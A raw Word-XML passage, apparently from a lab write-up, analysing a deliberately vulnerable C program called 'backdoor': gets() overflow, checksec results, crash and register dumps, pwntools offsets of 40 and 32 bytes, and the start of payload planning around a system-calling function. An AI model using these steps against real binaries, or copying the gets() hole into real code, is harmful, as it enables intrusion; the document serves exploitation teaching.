              <w:t xml:space="preserve">      "I patched out all my old bugs, so I know my code is super-secure!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39A1D3C3" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       Tell me your name, friend:"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1045AC1F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      );</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BE8D14A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  gets(data);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB1EE49" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  printf("You can\'t hack me, %s\n",data);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E0F174B" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  return 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23FDA1F7" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="033F6E07" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Main Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336CAB61" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t>The program takes in up to 32 bytes of user-entered data using gets before printing it to standard output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF781DA" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">Analysis with </w:t>
      </w:r>
      <w:r w:rsidRPr="00D76281">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PwnTools Checksec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> revealed that </w:t>
      </w:r>
      <w:r w:rsidRPr="00D76281">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> does not have a stack canary, making it a likely target for a stack overflow attack.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5130"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="08E1F383" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5130" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="343D8254" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] '/home/kali/Desktop/5-Week/backdoor'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36BDAD5A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Arch:     amd64-64-little</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B0318F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    RELRO:    Partial RELRO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="736A08F2" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Stack:    No canary found</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45E62F7D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    NX:       NX enabled</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AB8A6C1" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    PIE:      No PIE (0x400000)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F47A14F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Checksec Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0440CB" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70369791" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Too much input will cause </w:t>
      </w:r>
      <w:r w:rsidRPr="00D76281">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to crash with a segmentation error. The crash occurs when the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D76281">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method returns, popping the top value off the stack and jumping to that address. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="69A18DF2" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="79617E1F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] Process './backdoor' stopped with exit code -11 (SIGSEGV) (pid 1437485)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C30738F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[+] Parsing corefile...: Done</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59CDF802" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] '/home/kali/Desktop/5-Week/core.1437485'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DB0545F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Arch:      amd64-64-little</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00A18CB8" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    RIP:       0x40073c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50A017E7" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    RSP:       0x7fff509ad318</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28C1E771" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Exe:       '/home/kali/Desktop/5-Week/backdoor' (0x400000)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31D895EB" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Fault:     0x6161616c6161616b</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CFC373B" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] rsp = 0x7fff509ad318</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52DFAAA0" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] rip </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76281">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>offset = 40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75CF643D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Fault Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30456482" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The value at the top of the stack is not a valid address but rather a part of the input data. Additionally, some input data leaked into </w:t>
      </w:r>
      <w:r w:rsidRPr="00D76281">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rbp</w:t>
      </w:r>
      <w:r>
        <w:t>, overwriting the base pointer to the stack.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="764EB983" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="712D9BE0" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="00D76281">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>$rax</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: 0x0               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DC1D99B" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="00D76281">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>$rsp</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: 0x00007fffffffddc8 → </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76281">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>"kaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawa[...]"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10C60B9E" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$rbp: 0x6161616a61616169 ("iaaajaaa"?)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18B86D10" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="00D76281">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>$rsi</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: 0x00007fffffffdbf0 → "You can't hack me, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76281">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aaaabaaacaaadaaaeaaafaaagaaahaa[...]"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="763CCF48" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="00D76281">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>$rdi</w:t>
            </w:r>
            <w:r>
              <w:t>: 0x00007fffffffdbc0  →  0x00007fffffffdbf0  →  "You can't hack me,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15E90082" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      aaaabaaacaaadaaaeaaafaaagaaahaa[...]"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C53EBD" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="00D76281">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>$rip</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: 0x000000000040073c  →  &lt;main+68&gt; ret </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7804A562" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6549A0CD" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00D76281" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76281">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>stack ────</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54AAD095" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="00D76281">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0x00007fffffffddc8</w:t>
            </w:r>
            <w:r>
              <w:t>│+0x0000:"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76281">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>kaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawa[...]</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76281">
              <w:t xml:space="preserve">" </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76281">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>← $rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3810C47D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="00D76281">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0x00007fffffffddd0</w:t>
            </w:r>
            <w:r>
              <w:t>│+0x0008:"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76281">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaaya[...]</w:t>
            </w:r>
            <w:r>
              <w:t>"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="452FC915" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5541F315" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The input data overwrites the return address after 40 bytes and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D76281">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rbp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> after 32 bytes, the expected amount of allowed input.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4675"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="41DC92CC" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5E175F45" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali)-[~/Desktop/5-Week]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41AEB075" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">└─$ python3                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65B462E6" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>&gt;&gt;&gt; from pwn import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54430F0F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>&gt;&gt;&gt; cyclic_find("kaaa")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BA595CE" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A70D422" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>&gt;&gt;&gt; cyclic_find("iaaa")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2586DD17" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45F874F9" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Offset of RBP and Top of Stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AC5EA1" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">An attacker could force </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4CE0">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to execute code at a valid address by sending the program 40 characters of input followed by a valid address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB72F16" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1481AB" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40964EB6" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00847435">
        <w:lastRenderedPageBreak/>
        <w:t>Building a Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61566F49" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">Backdoor has a function called </w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>get_time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that it does not use during normal functionality. The function calls </w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t>, which the program imported from an external lib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7435" w14:paraId="44954EE0" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BF8352F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6086FE3F" wp14:editId="35D490BA">
                  <wp:extent cx="2105025" cy="2371725"/>
                  <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
                  <wp:docPr id="214190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56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2371725"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C1D3AF9" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="586C0F57" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36C1013E" wp14:editId="255980EA">
                  <wp:extent cx="2019300" cy="1828800"/>
                  <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                  <wp:docPr id="19773607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0714"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828800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00847435" w14:paraId="237B5759" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EFFD226" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Fig-Cap"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="272DCF6D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Fig-Cap"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Imports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DD2C780" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>get_time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function makes a </w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> call but does not run a command that an attacker would find immediately useful. The code is simple, with no red flags except for a warning that </w:t>
      </w:r>
      <w:r w:rsidRPr="00003294">
        <w:rPr>
          <w:i/>
